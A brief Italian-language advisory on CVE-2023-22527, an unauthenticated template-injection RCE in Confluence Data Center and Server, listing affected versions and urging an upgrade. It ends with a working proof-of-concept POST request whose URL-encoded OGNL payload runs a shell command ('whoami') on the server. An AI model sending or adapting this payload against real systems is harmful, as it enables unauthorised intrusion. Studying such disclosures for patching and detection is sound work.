
Una vulnerabilità di Remote Code Execution (RCE) di gravità critica (CVE-2023-22527) è stata scoperta in Confluence Server e Data Center.
Una vulnerabilità di injection nei template sulle versioni precedenti di Confluence Data Center e Server consente a un attaccante non autenticato di ottenere RCE su un'istanza interessata. I clienti che utilizzano una versione vulnerabile devono agire immediatamente. Le versioni più recenti supportate di Confluence Data Center e Server non sono interessate da questa vulnerabilità, poiché è stata mitigata durante i regolari aggiornamenti di versione. Tuttavia, Atlassian raccomanda ai clienti di installare l'ultima versione per proteggere le proprie istanze da vulnerabilità non critiche descritte nel bollettino di sicurezza di gennaio di Atlassian.
| Prodotto | Versioni interessate |
|---|
| Confluence Data Center e Server | 8.0.x 8.2.x 8.3.x 8.4.x 8.5.0-8.5.3 |
POST /template/aui/text-inline.vm HTTP/1.1
Host: {HOST_NAME}
Content-Type: application/x-www-form-urlencoded
Connection: close
label=aaa%5Cu0027%2B%23request.get%28%5Cu0027.KEY_velocity.struts2.context%5Cu0027%29.internalGet%28%5Cu0027ognl%5Cu0027%29.findValue%28%23parameters.poc%5B0%5D%2C%7B%7D%29%2B%5Cu0027&poc=%40org.apache.struts2.ServletActionContext%40getResponse%28%29.setHeader%28%5Cu0027Cmd-Ret%5Cu0027%2C%28new+freemarker.template.utility.Execute%28%29%29.exec%28%7B%22whoami%22%7D%29%29
